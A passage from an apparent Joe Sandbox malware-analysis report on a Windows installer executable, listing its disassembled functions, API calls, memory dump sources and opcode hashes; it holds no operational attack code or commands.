                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: "C:\Users\user\Desktop\YrCSUX2O3I.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-92336475
                                                            • Opcode ID: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                            • Instruction ID: fcf87bb4fcb389795acbe35438f6f12f46fcdf00a5008526b505f25df9ba4f2d
                                                            • Opcode Fuzzy Hash: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                            • Instruction Fuzzy Hash: B511B62684061299DB307B149C40B7763B8EF95760F51803FED8A732C0E77C5C9297AD
                                                            Function 004024EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 0040252D
                                                            • lstrlenA.KERNEL32(Heteric,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 00402534
                                                            • WriteFile.KERNEL32(00000000,?,Heteric,00000000,?,?,00000000,00000011), ref: 00402566
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                                            • String ID: 8$C:\Program Files (x86)\edelweissen\romanblade.ini$Heteric
                                                            • API String ID: 1453599865-1441359250
                                                            • Opcode ID: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                            • Instruction ID: 735716144e4411cb43a0d30ab2875379506436d26c05ff50a3a47e8288d67bee
                                                            • Opcode Fuzzy Hash: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                            • Instruction Fuzzy Hash: 62019271A44604FED700ABB19E4DEAF7668EF5031AF20053BB102B60D1D6FC4D919A6D
                                                            Function 00403FFC Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404019
                                                            • GetSysColor.USER32(00000000), ref: 00404035
                                                            • SetTextColor.GDI32(?,00000000), ref: 00404041
                                                            • SetBkMode.GDI32(?,?), ref: 0040404D
                                                            • GetSysColor.USER32(?), ref: 00404060
                                                            • SetBkColor.GDI32(?,?), ref: 00404070
                                                            • DeleteObject.GDI32(?), ref: 0040408A
                                                            • CreateBrushIndirect.GDI32(?), ref: 00404094
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                            • Instruction ID: 0ac1a71073e56fec278c78bb8edfd769e40e3e7d0c6ffac740e8a400aad481d4
                                                            • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                            • Instruction Fuzzy Hash: 7D2142B1500704ABC7319F68DE48B5B7BF8AF80714F04892DEA96B22A1D738E904CB54
                                                            Function 0040274B Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040280D
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                            • String ID:
                                                            • API String ID: 3294113728-0
                                                            • Opcode ID: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
                                                            • Instruction ID: 2d0112b2776dca8d717dfd9e18d313b89dca9e7a3efaaf21f9fdf9ae57e92bf3
                                                            • Opcode Fuzzy Hash: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
                                                            • Instruction Fuzzy Hash: CE317C72800128BBCF116FA5CE499AE7A79EF09364F10423AF521762E0CB794D419BA8
                                                            Function 004048C4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004048DF
                                                            • GetMessagePos.USER32 ref: 004048E7
                                                            • ScreenToClient.USER32(?,?), ref: 00404901
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404913
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404939
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                            • Instruction ID: b2acda07281727c86be124b4dee47d1cf8a7ad48e0f381a449079fc6aa512a42
                                                            • Opcode Fuzzy Hash: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                            • Instruction Fuzzy Hash: 6F014C71900219BADB10DBA4DD85BFFBBBCAF59711F10012ABB50B61D0D6B499018BA4
                                                            Function 00402C15 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
                                                            • MulDiv.KERNEL32(001049D3,00000064,001052D8), ref: 00402C5E
                                                            • wsprintfW.USER32 ref: 00402C6E
                                                            • SetWindowTextW.USER32(?,?), ref: 00402C7E
                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C90
                                                            Strings
                                                            • verifying installer: %d%%, xrefs: 00402C68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: verifying installer: %d%%
                                                            • API String ID: 1451636040-82062127
                                                            • Opcode ID: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                            • Instruction ID: fc2375c20bf1a940e442d42f67f4bd9350dc1e6ed8ae84fb9db5d2f1b0513ae1
                                                            • Opcode Fuzzy Hash: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                            • Instruction Fuzzy Hash: 28014F70640208BBEF24AF61DD49BEE3B69FB04309F008439FA06A91D0DBB89555CF59
                                                            Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401D44
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                            • CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID: Calibri
                                                            • API String ID: 3808545654-1409258342
                                                            • Opcode ID: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
                                                            • Instruction ID: ac5daf38e842c3ef37672eab1df37869b96295c9a8c7d69064dded374e835ef9
                                                            • Opcode Fuzzy Hash: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
                                                            • Instruction Fuzzy Hash: 1B016D35544640EFEB016BB0AF4AB9A3FB4EF25305F144579F545B62E2CA78040A9B2D
                                                            Function 00402571 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,00000001,?), ref: 004025CA
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
                                                            • ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607
                                                              • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: FileRead$ByteCharMultiWidewsprintf
                                                            • String ID: 9
                                                            • API String ID: 3029736425-2366072709
                                                            • Opcode ID: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
                                                            • Instruction ID: 3f2e9d39a30109d4dd297e12bf5cacaacaa6ae2deeb589865bf4cc510dd46cad
                                                            • Opcode Fuzzy Hash: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
                                                            • Instruction Fuzzy Hash: 1A315E7190021AAADF20DF94DA88EBEB7B9EB14344F50443BE401F62D4D7B98A818B59
                                                            Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                            • lstrlenW.KERNEL32(C:\Program Files (x86)\edelweissen\romanblade.ini,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateValuelstrlen
                                                            • String ID: C:\Program Files (x86)\edelweissen\romanblade.ini
                                                            • API String ID: 1356686001-3814320704
                                                            • Opcode ID: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
                                                            • Instruction ID: ae8cd99e4777b9a91f11086a6aa50b0fceabbd5df02328ddbc6dea80253d30cd
                                                            • Opcode Fuzzy Hash: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
                                                            • Instruction Fuzzy Hash: 73119371A00109BFEB10EFA1DE49EAF7A7CEB40358F11403AF505B61D0DBB85D409B68
                                                            Function 00402B10 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B31
                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B76
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B9B
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Close$DeleteEnumOpen
                                                            • String ID:
                                                            • API String ID: 1912718029-0
                                                            • Opcode ID: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
                                                            • Instruction ID: 30c1bee4f6ef5540a549b97fb3682634b1066eef3f365ecf60e24fe04a280a9b
                                                            • Opcode Fuzzy Hash: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
                                                            • Instruction Fuzzy Hash: F6113A71500108BFDF109F90DE89DAE3B79EB44348F10447AFA15B11A0D7B9AE55AA18
                                                            Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
